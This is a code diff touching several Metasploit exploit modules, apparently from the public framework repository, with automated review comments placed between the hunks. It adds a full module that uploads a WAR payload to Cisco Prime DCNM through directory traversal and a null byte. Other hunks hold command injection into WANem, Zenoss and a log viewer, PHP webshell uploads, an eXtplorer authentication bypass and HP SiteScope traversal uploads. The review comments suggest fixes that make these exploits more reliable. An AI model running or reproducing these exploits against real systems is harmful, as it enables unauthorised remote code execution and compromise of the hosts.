elsif res and res.code == 302 and res.headers['Location'] =~ /\/index\.html\?redirect/ elsif res and res.code == 302 and res.headers['Location'] =~ /\/index\.html\?redirect/
fail_with(Failure::NoAccess, 'Authentication failed') fail_with(Failure::NoAccess, 'Authentication failed')
else else


@ -65,12 +65,11 @@ class Metasploit3 < Msf::Exploit::Remote
end end
def check def check
@peer = "#{rhost}:#{rport}"
fingerprint = Rex::Text.rand_text_alphanumeric(rand(8)+4) fingerprint = Rex::Text.rand_text_alphanumeric(rand(8)+4)
data = "pc=127.0.0.1; " data = "pc=127.0.0.1; "
data << Rex::Text.uri_encode("echo #{fingerprint}") data << Rex::Text.uri_encode("echo #{fingerprint}")
data << "%26" data << "%26"
print_status("#{@peer} - Sending check") print_status("#{peer} - Sending check")
begin begin
res = send_request_cgi({ res = send_request_cgi({
@ -79,7 +78,7 @@ class Metasploit3 < Msf::Exploit::Remote
'data' => data 'data' => data
}, 25) }, 25)
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
print_error("#{@peer} - Connection failed") print_error("#{peer} - Connection failed")
return Exploit::CheckCode::Unknown return Exploit::CheckCode::Unknown
end end
@ -91,11 +90,10 @@ class Metasploit3 < Msf::Exploit::Remote
end end
def exploit def exploit
@peer = "#{rhost}:#{rport}"
data = "pc=127.0.0.1; " data = "pc=127.0.0.1; "
data << Rex::Text.uri_encode(payload.raw) data << Rex::Text.uri_encode(payload.raw)
data << "%26" data << "%26"
print_status("#{@peer} - Sending payload (#{payload.raw.length} bytes)") print_status("#{peer} - Sending payload (#{payload.raw.length} bytes)")
begin begin
res = send_request_cgi({ res = send_request_cgi({
'uri' => '/WANem/result.php', 'uri' => '/WANem/result.php',
@ -103,12 +101,12 @@ class Metasploit3 < Msf::Exploit::Remote
'data' => data 'data' => data
}, 25) }, 25)
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
print_error("#{@peer} - Connection failed") print_error("#{peer} - Connection failed")
end end
if res and res.code == 200 if res and res.code == 200
print_good("#{@peer} - Payload sent successfully") print_good("#{peer} - Payload sent successfully")
else else
print_error("#{@peer} - Sending payload failed") print_error("#{peer} - Sending payload failed")
end end
end end


@ -65,11 +65,8 @@ class Metasploit3 < Msf::Exploit::Remote
end end
def check def check
@peer = "#{rhost}:#{rport}"
# retrieve software version from config file # retrieve software version from config file
print_status("#{@peer} - Sending check") print_status("#{peer} - Sending check")
begin begin
res = send_request_cgi({ res = send_request_cgi({
'uri' => '/config/global.conf' 'uri' => '/config/global.conf'
@ -82,15 +79,13 @@ class Metasploit3 < Msf::Exploit::Remote
end end
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
print_error("#{@peer} - Connection failed") print_error("#{peer} - Connection failed")
end end
return Exploit::CheckCode::Unknown return Exploit::CheckCode::Unknown
end end
def exploit def exploit
@peer = "#{rhost}:#{rport}"
user = datastore['USERNAME'] user = datastore['USERNAME']
pass = datastore['PASSWORD'] pass = datastore['PASSWORD']
auth = Rex::Text.encode_base64("#{user}:#{pass}") auth = Rex::Text.encode_base64("#{user}:#{pass}")
@ -98,7 +93,7 @@ class Metasploit3 < Msf::Exploit::Remote
lines = rand(100) + 1 lines = rand(100) + 1
# send payload # send payload
print_status("#{@peer} - Sending payload (#{payload.encoded.length} bytes)") print_status("#{peer} - Sending payload (#{payload.encoded.length} bytes)")
begin begin
res = send_request_cgi({ res = send_request_cgi({
'uri' => "/index.cgi?nlines=#{lines}&action=See+logs&id=2-2&filelog=#{cmd}", 'uri' => "/index.cgi?nlines=#{lines}&action=See+logs&id=2-2&filelog=#{cmd}",


@ -63,9 +63,6 @@ class Metasploit3 < Msf::Exploit::Remote
end end
def check def check
@peer = "#{rhost}:#{rport}"
# retrieve software version from login page # retrieve software version from login page
begin begin
res = send_request_raw({ res = send_request_raw({
@ -76,22 +73,20 @@ class Metasploit3 < Msf::Exploit::Remote
return Exploit::CheckCode::Detected if res.body =~ /<link rel="shortcut icon" type="image\/x\-icon" href="\/zport\/dmd\/favicon\.ico" \/>/ return Exploit::CheckCode::Detected if res.body =~ /<link rel="shortcut icon" type="image\/x\-icon" href="\/zport\/dmd\/favicon\.ico" \/>/
return Exploit::CheckCode::Safe return Exploit::CheckCode::Safe
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeoutp rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeoutp
print_error("#{@peer} - Connection failed") print_error("#{peer} - Connection failed")
end end
return Exploit::CheckCode::Unknown return Exploit::CheckCode::Unknown
end end
def exploit def exploit
@peer = "#{rhost}:#{rport}"
username = datastore['USERNAME'] username = datastore['USERNAME']
password = datastore['PASSWORD'] password = datastore['PASSWORD']
command = URI.encode(payload.encoded)+"%26" command = URI.encode(payload.encoded)+"%26"
postdata = "__ac_name=#{username}&__ac_password=#{password}&daemon=#{command}" postdata = "__ac_name=#{username}&__ac_password=#{password}&daemon=#{command}"
# send payload # send payload
print_status("#{@peer} - Sending payload to Zenoss (#{command.length.to_s} bytes)") print_status("#{peer} - Sending payload to Zenoss (#{command.length.to_s} bytes)")
begin begin
res = send_request_cgi({ res = send_request_cgi({
'method' => 'POST', 'method' => 'POST',
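Review bot: `rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeoutp` in `check` names a constant that does not exist; Ruby resolves the rescue list only when an exception propagates, so a timeout would surface as a `NameError` for `Rex::ConnectionTimeoutp` instead of reaching the `print_error("#{peer} - Connection failed")` line the refactor just touched. The fix is the one-character change `rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout`, matching the rescue list used in `exploit`. `check` begins outside this hunk.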
@ -99,14 +94,14 @@ class Metasploit3 < Msf::Exploit::Remote
'data' => "#{postdata}", 'data' => "#{postdata}",
}) })
if res and res['Bobo-Exception-Type'] =~ /^Unauthorized$/ if res and res['Bobo-Exception-Type'] =~ /^Unauthorized$/
print_error("#{@peer} - Authentication failed. Incorrect username/password.") print_error("#{peer} - Authentication failed. Incorrect username/password.")
return return
end end
print_status("#{@peer} - Sent payload successfully") print_status("#{peer} - Sent payload successfully")
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
print_error("#{@peer} - Connection failed") print_error("#{peer} - Connection failed")
rescue rescue
print_error("#{@peer} - Sending payload failed") print_error("#{peer} - Sending payload failed")
end end
handler handler


@ -78,7 +78,7 @@ class Metasploit3 < Msf::Exploit::Remote
post_data = data.to_s post_data = data.to_s
post_data = post_data.gsub(/^\r\n\-\-\_Part\_/, '--_Part_') post_data = post_data.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')
print_status("#{@peer} - Uploading payload (#{p.length.to_s} bytes)...") print_status("#{peer} - Uploading payload (#{p.length.to_s} bytes)...")
res = send_request_cgi({ res = send_request_cgi({
'method' => 'POST', 'method' => 'POST',
'uri' => normalize_uri("#{base}/admin/sitebanners/upload_banners.php"), 'uri' => normalize_uri("#{base}/admin/sitebanners/upload_banners.php"),
@ -87,14 +87,14 @@ class Metasploit3 < Msf::Exploit::Remote
}) })
if not res if not res
print_error("#{@peer} - No response from host") print_error("#{peer} - No response from host")
return return
end end
print_status("#{@peer} - Requesting '#{php_fname}'...") print_status("#{peer} - Requesting '#{php_fname}'...")
res = send_request_raw({'uri'=>normalize_uri("#{base}/banners/#{php_fname}")}) res = send_request_raw({'uri'=>normalize_uri("#{base}/banners/#{php_fname}")})
if res and res.code == 404 if res and res.code == 404
print_error("#{@peer} - Upload unsuccessful: #{res.code.to_s}") print_error("#{peer} - Upload unsuccessful: #{res.code.to_s}")
return return
end end
@ -103,8 +103,6 @@ class Metasploit3 < Msf::Exploit::Remote
def exploit def exploit
@peer = "#{rhost}:#{rport}"
uri = normalize_uri(target_uri.path) uri = normalize_uri(target_uri.path)
uri << '/' if uri[-1,1] != '/' uri << '/' if uri[-1,1] != '/'
base = File.dirname("#{uri}.") base = File.dirname("#{uri}.")


@ -0,0 +1,153 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'Cisco Prime Data Center Network Manager Arbitrary File Upload',
'Description' => %q{
This module exploits a code execution flaw in Cisco Data Center Network Manager. The
vulnerability exists in processImageSave.jsp, which can be abused through a directory
traversal and a null byte injection to upload arbitrary files. The autodeploy JBoss
application server feature is used to achieve remote code execution. This module has been
tested successfully on Cisco Prime Data Center Network Manager 6.1(2) on Windows 2008 R2
(64 bits).
},
'Author' =>
[
'rgod <rgod[at]autistici.org>', # Vulnerability discovery
'juan vazquez' # Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2013-5486'],
[ 'OSVDB', '97426' ],
[ 'ZDI', '13-254' ],
[ 'URL', 'http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20130918-dcnm' ]
],
'Privileged' => true,
'Platform' => 'java',
'Arch' => ARCH_JAVA,
'Targets' =>
[
[ 'Cisco DCNM 6.1(2) / Java Universal',
{
'AutoDeployPath' => "../../../../../deploy",
'CleanupPath' => "../../jboss-4.2.2.GA/server/fm/deploy"
}
]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Sep 18 2013'))
register_options(
[
OptString.new('TARGETURI', [true, 'Path to Cisco DCNM', '/']),
OptInt.new('ATTEMPTS', [true, 'The number of attempts to execute the payload (auto deployed by JBoss)', 10])
], self.class)
end
def upload_file(location, filename, contents)
res = send_request_cgi(
{
'uri' => normalize_uri(target_uri.path, "cues_utility", "charts", "processImageSave.jsp"),
'method' => 'POST',
'encode_params' => false,
'vars_post' =>
{
"mode" => "save",
"savefile" => "true",
"chartid" => "#{location}/#(unknown)%00",
"data" => Rex::Text.uri_encode(Rex::Text.encode_base64(contents))
}
})
if res and res.code == 200 and res.body.to_s =~ /success/
return true
else
return false
end
end
def check
version = ""
res = send_request_cgi({
'url' => target_uri.to_s,
'method' => 'GET'
})
unless res
return Exploit::CheckCode::Unknown
end
if res.code == 200 and
res.body.to_s =~ /Data Center Network Manager/ and
res.body.to_s =~ /<div class="productVersion">Version: (.*)<\/div>/
version = $1
print_status("Cisco Primer Data Center Network Manager version #{version} found")
elsif res.code == 200 and
res.body.to_s =~ /Data Center Network Manager/
return Exploit::CheckCode::Detected
else
return Exploit::CheckCode::Safe
end
if version =~ /6\.1/
return Exploit::CheckCode::Vulnerable
end
return Exploit::CheckCode::Safe
end
def exploit
attempts = datastore['ATTEMPTS']
fail_with(Failure::BadConfig, "#{peer} - Configure 1 or more ATTEMPTS") unless attempts > 0
app_base = rand_text_alphanumeric(4+rand(32-4))
# By default uploads land here: C:\Program Files\Cisco Systems\dcm\jboss-4.2.2.GA\server\fm\tmp\deploy\tmp3409372432509144123dcm-exp.war\cues_utility\charts
# Auto deploy dir is here C:\Program Files\Cisco Systems\dcm\jboss-4.2.2.GA\server\fm\deploy
# Sessions pwd is here C:\Program Files\Cisco Systems\dcm\fm\bin
war = payload.encoded_war({ :app_name => app_base }).to_s
war_filename = "#{app_base}.war"
war_location = target['AutoDeployPath']
print_status("#{peer} - Uploading WAR file #{war_filename}...")
res = upload_file(war_location, war_filename, war)
if res
register_files_for_cleanup("#{target['CleanupPath']}/#{war_filename}")
else
fail_with(Failure::Unknown, "#{peer} - Failed to upload the WAR payload")
end
attempts.times do
select(nil, nil, nil, 2)
# Now make a request to trigger the newly deployed war
print_status("#{peer} - Attempting to launch payload in deployed WAR...")
res = send_request_cgi(
{
'uri' => normalize_uri(target_uri.path, app_base, Rex::Text.rand_text_alpha(rand(8)+8)),
'method' => 'GET'
})
# Failure. The request timed out or the server went away.
fail_with(Failure::TimeoutExpired, "#{peer} - The request timed out or the server went away.") if res.nil?
# Success! Triggered the payload, should have a shell incoming
break if res.code == 200
end
end
end
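Review bot: `check` passes `'url' => target_uri.to_s` to `send_request_cgi`, while every other request in this file (`upload_file`, `exploit`) uses the `'uri'` key; the unknown key is most likely ignored, so the version probe would not be sent to TARGETURI and the check only works when DCNM is deployed at the default `/`. Change it to `'uri' => normalize_uri(target_uri.path)`. Two smaller points: `upload_file`'s `filename` argument does not appear in the `chartid` value on the rendered line (possibly a rendering loss of the interpolation, worth confirming against the source), and the status string says `Cisco Primer` where the module name says `Prime`.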


@ -99,20 +99,19 @@ class Metasploit3 < Msf::Exploit::Remote
def exploit def exploit
base = normalize_uri(target_uri.path) base = normalize_uri(target_uri.path)
base << '/' if base[-1, 1] != '/' base << '/' if base[-1, 1] != '/'
@peer = "#{rhost}:#{rport}"
# upload PHP payload to upload/___1/ # upload PHP payload to upload/___1/
print_status("#{@peer} - Uploading PHP payload (#{payload.encoded.length.to_s} bytes)") print_status("#{peer} - Uploading PHP payload (#{payload.encoded.length.to_s} bytes)")
fname = rand_text_alphanumeric(rand(10)+6) + '.php' fname = rand_text_alphanumeric(rand(10)+6) + '.php'
php = %Q|<?php #{payload.encoded} ?>| php = %Q|<?php #{payload.encoded} ?>|
res = upload(base, fname, php) res = upload(base, fname, php)
if res.nil? if res.nil?
print_error("#{@peer} - Uploading PHP payload failed") print_error("#{peer} - Uploading PHP payload failed")
return return
end end
# retrieve and execute PHP payload # retrieve and execute PHP payload
print_status("#{@peer} - Retrieving file: #{fname}") print_status("#{peer} - Retrieving file: #{fname}")
send_request_raw({ send_request_raw({
'method' => 'GET', 'method' => 'GET',
'uri' => normalize_uri(base, "upload/___1/#{fname}") 'uri' => normalize_uri(base, "upload/___1/#{fname}")


@ -135,22 +135,22 @@ class Metasploit3 < Msf::Exploit::Remote
base = target_uri.path base = target_uri.path
base << '/' if base[-1, 1] != '/' base << '/' if base[-1, 1] != '/'
@peer = "#{rhost}:#{rport}"
@fname= rand_text_alphanumeric(rand(10)+6) + '.php' @fname= rand_text_alphanumeric(rand(10)+6) + '.php'
user = datastore['USERNAME'] user = datastore['USERNAME']
datastore['COOKIE'] = "eXtplorer="+rand_text_alpha_lower(26)+";" datastore['COOKIE'] = "eXtplorer="+rand_text_alpha_lower(26)+";"
# bypass auth # bypass auth
print_status("#{@peer} - Authenticating as user (#{user})") print_status("#{peer} - Authenticating as user (#{user})")
res = auth_bypass(base, user) res = auth_bypass(base, user)
if res and res.code == 200 and res.body =~ /Are you sure you want to delete these/ if res and res.code == 200 and res.body =~ /Are you sure you want to delete these/
print_status("#{@peer} - Authenticated successfully") print_status("#{peer} - Authenticated successfully")
else else
fail_with(Failure::NoAccess, "#{@peer} - Authentication failed") fail_with(Failure::NoAccess, "#{peer} - Authentication failed")
end end
# search for writable directories # search for writable directories
print_status("#{@peer} - Retrieving writable subdirectories") print_status("#{peer} - Retrieving writable subdirectories")
begin begin
res = send_request_cgi({ res = send_request_cgi({
'method' => 'POST', 'method' => 'POST',
@ -159,32 +159,32 @@ class Metasploit3 < Msf::Exploit::Remote
'data' => "option=com_extplorer&action=getdircontents&dir=#{base}&sendWhat=dirs&node=ext_root", 'data' => "option=com_extplorer&action=getdircontents&dir=#{base}&sendWhat=dirs&node=ext_root",
}) })
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
fail_with(Failure::Unreachable, "#{@peer} - Connection failed") fail_with(Failure::Unreachable, "#{peer} - Connection failed")
end end
if res and res.code == 200 and res.body =~ /\{'text':'([^']+)'[^\}]+'is_writable':true/ if res and res.code == 200 and res.body =~ /\{'text':'([^']+)'[^\}]+'is_writable':true/
dir = "#{base}#{$1}" dir = "#{base}#{$1}"
print_status("#{@peer} - Successfully retrieved writable subdirectory (#{$1})") print_status("#{peer} - Successfully retrieved writable subdirectory (#{$1})")
else else
dir = "#{base}" dir = "#{base}"
print_error("#{@peer} - Could not find a writable subdirectory.") print_error("#{peer} - Could not find a writable subdirectory.")
end end
# upload PHP payload # upload PHP payload
print_status("#{@peer} - Uploading PHP payload (#{payload.encoded.length.to_s} bytes) to #{dir}") print_status("#{peer} - Uploading PHP payload (#{payload.encoded.length.to_s} bytes) to #{dir}")
php = %Q|<?php #{payload.encoded} ?>| php = %Q|<?php #{payload.encoded} ?>|
begin begin
res = upload(base, dir, @fname, php) res = upload(base, dir, @fname, php)
if res and res.code == 200 and res.body =~ /'message':'Upload successful\!'/ if res and res.code == 200 and res.body =~ /'message':'Upload successful\!'/
print_good("#{@peer} - File uploaded successfully") print_good("#{peer} - File uploaded successfully")
else else
fail_with(Failure::UnexpectedReply, "#{@peer} - Uploading PHP payload failed") fail_with(Failure::UnexpectedReply, "#{peer} - Uploading PHP payload failed")
end end
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
fail_with(Failure::Unreachable, "#{@peer} - Connection failed") fail_with(Failure::Unreachable, "#{peer} - Connection failed")
end end
# search directories in the web root for the file # search directories in the web root for the file
print_status("#{@peer} - Searching directories for file (#{@fname})") print_status("#{peer} - Searching directories for file (#{@fname})")
begin begin
res = send_request_cgi({ res = send_request_cgi({
'method' => 'POST', 'method' => 'POST',
@ -193,27 +193,27 @@ class Metasploit3 < Msf::Exploit::Remote
'cookie' => datastore['COOKIE'], 'cookie' => datastore['COOKIE'],
}) })
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
fail_with(Failure::Unreachable, "#{@peer} - Connection failed") fail_with(Failure::Unreachable, "#{peer} - Connection failed")
end end
if res and res.code == 200 and res.body =~ /'dir':'\\\/([^']+)'/ if res and res.code == 200 and res.body =~ /'dir':'\\\/([^']+)'/
dir = $1.gsub('\\','') dir = $1.gsub('\\','')
print_good("#{@peer} - Successfully found file") print_good("#{peer} - Successfully found file")
else else
print_error("#{@peer} - Failed to find file") print_error("#{peer} - Failed to find file")
end end
# retrieve and execute PHP payload # retrieve and execute PHP payload
print_status("#{@peer} - Executing payload (/#{dir}/#{@fname})") print_status("#{peer} - Executing payload (/#{dir}/#{@fname})")
begin begin
send_request_cgi({ send_request_cgi({
'method' => 'GET', 'method' => 'GET',
'uri' => "/#{dir}/#{@fname}" 'uri' => "/#{dir}/#{@fname}"
}) })
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
fail_with(Failure::Unreachable, "#{@peer} - Connection failed") fail_with(Failure::Unreachable, "#{peer} - Connection failed")
end end
if res and res.code != 200 if res and res.code != 200
print_error("#{@peer} - Executing payload failed") print_error("#{peer} - Executing payload failed")
end end
end end
end end
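Review bot: the closing `if res and res.code != 200` tests the wrong response — the `send_request_cgi` that fetches `/#{dir}/#{@fname}` discards its return value, so `res` still holds the reply from the directory-search request and the `print_error("#{peer} - Executing payload failed")` branch never reflects the payload fetch. Assign it, `res = send_request_cgi({`, inside the `begin` block so the status check is meaningful. `exploit` begins outside this hunk.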


@ -124,38 +124,37 @@ class Metasploit3 < Msf::Exploit::Remote
def exploit def exploit
base = target_uri.path base = target_uri.path
@peer = "#{rhost}:#{rport}"
@fname= rand_text_alphanumeric(rand(10)+6) + '.php' @fname= rand_text_alphanumeric(rand(10)+6) + '.php'
user = datastore['USERNAME'] user = datastore['USERNAME']
pass = datastore['PASSWORD'] pass = datastore['PASSWORD']
# login; get session id and token # login; get session id and token
print_status("#{@peer} - Authenticating as user '#{user}'") print_status("#{peer} - Authenticating as user '#{user}'")
res = login(base, user, pass) res = login(base, user, pass)
if res and res.code == 301 and res.headers['set-cookie'] =~ /sid([\da-f]+)=([\da-f]{32})/ if res and res.code == 301 and res.headers['set-cookie'] =~ /sid([\da-f]+)=([\da-f]{32})/
token = "#{$1}" token = "#{$1}"
sid = "#{$2}" sid = "#{$2}"
print_good("#{@peer} - Authenticated successfully") print_good("#{peer} - Authenticated successfully")
else else
fail_with(Failure::NoAccess, "#{@peer} - Authentication failed") fail_with(Failure::NoAccess, "#{peer} - Authentication failed")
end end
# upload PHP payload # upload PHP payload
print_status("#{@peer} - Uploading PHP payload (#{payload.encoded.length} bytes)") print_status("#{peer} - Uploading PHP payload (#{payload.encoded.length} bytes)")
php = %Q|<?php #{payload.encoded} ?>| php = %Q|<?php #{payload.encoded} ?>|
begin begin
res = upload(base, sid, @fname, php) res = upload(base, sid, @fname, php)
if res and res.code == 301 and res['location'] =~ /Setting saved/ if res and res.code == 301 and res['location'] =~ /Setting saved/
print_good("#{@peer} - File uploaded successfully") print_good("#{peer} - File uploaded successfully")
else else
fail_with(Failure::UnexpectedReply, "#{@peer} - Uploading PHP payload failed") fail_with(Failure::UnexpectedReply, "#{peer} - Uploading PHP payload failed")
end end
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
fail_with(Failure::Unreachable, "#{@peer} - Connection failed") fail_with(Failure::Unreachable, "#{peer} - Connection failed")
end end
# retrieve PHP file path # retrieve PHP file path
print_status("#{@peer} - Locating PHP payload file") print_status("#{peer} - Locating PHP payload file")
begin begin
res = send_request_cgi({ res = send_request_cgi({
'method' => 'GET', 'method' => 'GET',
@ -163,28 +162,28 @@ class Metasploit3 < Msf::Exploit::Remote
'cookie' => "sid#{token}=#{sid}" 'cookie' => "sid#{token}=#{sid}"
}) })
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
fail_with(Failure::Unreachable, "#{@peer} - Connection failed") fail_with(Failure::Unreachable, "#{peer} - Connection failed")
end end
if res and res.code == 200 and res.body =~ /<img width="" height="" src="([^"]+)"/ if res and res.code == 200 and res.body =~ /<img width="" height="" src="([^"]+)"/
shell_uri = "#{$1}" shell_uri = "#{$1}"
@fname = shell_uri.match('(\d+_[a-zA-Z\d]+\.php)') @fname = shell_uri.match('(\d+_[a-zA-Z\d]+\.php)')
print_good("#{@peer} - Found payload file path (#{shell_uri})") print_good("#{peer} - Found payload file path (#{shell_uri})")
else else
fail_with(Failure::UnexpectedReply, "#{@peer} - Failed to find PHP payload file path") fail_with(Failure::UnexpectedReply, "#{peer} - Failed to find PHP payload file path")
end end
# retrieve and execute PHP payload # retrieve and execute PHP payload
print_status("#{@peer} - Executing payload (#{shell_uri})") print_status("#{peer} - Executing payload (#{shell_uri})")
begin begin
send_request_cgi({ send_request_cgi({
'method' => 'GET', 'method' => 'GET',
'uri' => normalize_uri(base, shell_uri), 'uri' => normalize_uri(base, shell_uri),
}) })
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
fail_with(Failure::Unreachable, "#{@peer} - Connection failed") fail_with(Failure::Unreachable, "#{peer} - Connection failed")
end end
if !res or res.code != 200 if !res or res.code != 200
fail_with(Failure::UnexpectedReply, "#{@peer} - Executing payload failed") fail_with(Failure::UnexpectedReply, "#{peer} - Executing payload failed")
end end
end end
end end
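Review bot: The final status check in `exploit`, `if !res or res.code != 200`, tests a stale response, because the 'Executing payload' request just above discards its return value and `res` still holds the reply from the 'Locating PHP payload file' step, which was already verified as 200, so the check can never fire. Assigning the result, `res = send_request_cgi({`, makes the check meaningful. Separately, `@fname = shell_uri.match('(\d+_[a-zA-Z\d]+\.php)')` stores a MatchData object rather than the captured filename; if `@fname` is interpolated later (its later use is outside the hunk, so confirm), `shell_uri.match(...)[1]` is probably what was intended.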


@ -84,20 +84,19 @@ class Metasploit3 < Msf::Exploit::Remote
end end
def exploit def exploit
@peer = "#{rhost}:#{rport}"
@uri = normalize_uri(target_uri.path) @uri = normalize_uri(target_uri.path)
@uri << '/' if @uri[-1,1] != '/' @uri << '/' if @uri[-1,1] != '/'
# Create user with empty credentials # Create user with empty credentials
print_status("#{@peer} - Creating user with empty credentials") print_status("#{peer} - Creating user with empty credentials")
if create_user.nil? if create_user.nil?
print_error("#{@peer} - Failed to create user") print_error("#{peer} - Failed to create user")
return return
end end
# Generate an initial JSESSIONID # Generate an initial JSESSIONID
print_status("#{@peer} - Retrieving an initial JSESSIONID") print_status("#{peer} - Retrieving an initial JSESSIONID")
res = send_request_cgi( res = send_request_cgi(
'uri' => normalize_uri(@uri, 'servlet/Main'), 'uri' => normalize_uri(@uri, 'servlet/Main'),
'method' => 'POST' 'method' => 'POST'
@ -106,14 +105,14 @@ class Metasploit3 < Msf::Exploit::Remote
if res and res.code == 200 and res.headers['Set-Cookie'] =~ /JSESSIONID=([0-9A-F]*);/ if res and res.code == 200 and res.headers['Set-Cookie'] =~ /JSESSIONID=([0-9A-F]*);/
session_id = $1 session_id = $1
else else
print_error("#{@peer} - Retrieve of initial JSESSIONID failed") print_error("#{peer} - Retrieve of initial JSESSIONID failed")
return return
end end
# Authenticate # Authenticate
login_data = "j_username=&j_password=" login_data = "j_username=&j_password="
print_status("#{@peer} - Authenticating on HP SiteScope Configuration") print_status("#{peer} - Authenticating on HP SiteScope Configuration")
res = send_request_cgi( res = send_request_cgi(
{ {
'uri' => normalize_uri(@uri, 'j_security_check'), 'uri' => normalize_uri(@uri, 'j_security_check'),
@ -130,12 +129,12 @@ class Metasploit3 < Msf::Exploit::Remote
session_id = $1 session_id = $1
redirect = URI(res.headers['Location']).path redirect = URI(res.headers['Location']).path
else else
print_error("#{@peer} - Authentication on SiteScope failed") print_error("#{peer} - Authentication on SiteScope failed")
return return
end end
# Follow redirection to complete authentication process # Follow redirection to complete authentication process
print_status("#{@peer} - Following redirection to finish authentication") print_status("#{peer} - Following redirection to finish authentication")
res = send_request_cgi( res = send_request_cgi(
{ {
'uri' => redirect, 'uri' => redirect,
@ -147,7 +146,7 @@ class Metasploit3 < Msf::Exploit::Remote
}) })
if not res or res.code != 200 if not res or res.code != 200
print_error("#{@peer} - Authentication on SiteScope failed") print_error("#{peer} - Authentication on SiteScope failed")
return return
end end
@ -235,7 +234,7 @@ class Metasploit3 < Msf::Exploit::Remote
traversal = "..\\..\\..\\..\\..\\..\\" traversal = "..\\..\\..\\..\\..\\..\\"
end end
print_status("#{@peer} - Uploading the payload") print_status("#{peer} - Uploading the payload")
res = send_request_cgi( res = send_request_cgi(
{ {
'uri' => "#{@uri}upload?REMOTE_HANDLER_KEY=UploadFilesHandler&UploadFilesHandler.file.name=#{traversal}#{@var_hexfile}.txt&UploadFilesHandler.ovveride=true", 'uri' => "#{@uri}upload?REMOTE_HANDLER_KEY=UploadFilesHandler&UploadFilesHandler.file.name=#{traversal}#{@var_hexfile}.txt&UploadFilesHandler.ovveride=true",
@ -250,16 +249,16 @@ class Metasploit3 < Msf::Exploit::Remote
if res and res.code == 200 and res.body =~ /file: (.*) uploaded succesfuly to server/ if res and res.code == 200 and res.body =~ /file: (.*) uploaded succesfuly to server/
path = $1 path = $1
print_good("#{@peer} - Payload successfully uploaded to #{path}") print_good("#{peer} - Payload successfully uploaded to #{path}")
else else
print_error("#{@peer} - Error uploading the Payload") print_error("#{peer} - Error uploading the Payload")
return return
end end
post_data = Rex::MIME::Message.new post_data = Rex::MIME::Message.new
post_data.add_part(jspraw, "application/octet-stream", nil, "form-data; name=\"#{rand_text_alpha(4)}\"; filename=\"#{rand_text_alpha(4)}.png\"") post_data.add_part(jspraw, "application/octet-stream", nil, "form-data; name=\"#{rand_text_alpha(4)}\"; filename=\"#{rand_text_alpha(4)}.png\"")
print_status("#{@peer} - Uploading the JSP") print_status("#{peer} - Uploading the JSP")
res = send_request_cgi( res = send_request_cgi(
{ {
'uri' => normalize_uri(@uri, 'upload') + "?REMOTE_HANDLER_KEY=UploadFilesHandler&UploadFilesHandler.file.name=#{traversal}#{@jsp_name}.jsp&UploadFilesHandler.ovveride=true", 'uri' => normalize_uri(@uri, 'upload') + "?REMOTE_HANDLER_KEY=UploadFilesHandler&UploadFilesHandler.file.name=#{traversal}#{@jsp_name}.jsp&UploadFilesHandler.ovveride=true",
@ -274,9 +273,9 @@ class Metasploit3 < Msf::Exploit::Remote
if res and res.code == 200 and res.body =~ /file: (.*) uploaded succesfuly to server/ if res and res.code == 200 and res.body =~ /file: (.*) uploaded succesfuly to server/
path = $1 path = $1
print_good("#{@peer} - JSP successfully uploaded to #{path}") print_good("#{peer} - JSP successfully uploaded to #{path}")
else else
print_error("#{@peer} - Error uploading the JSP") print_error("#{peer} - Error uploading the JSP")
return return
end end
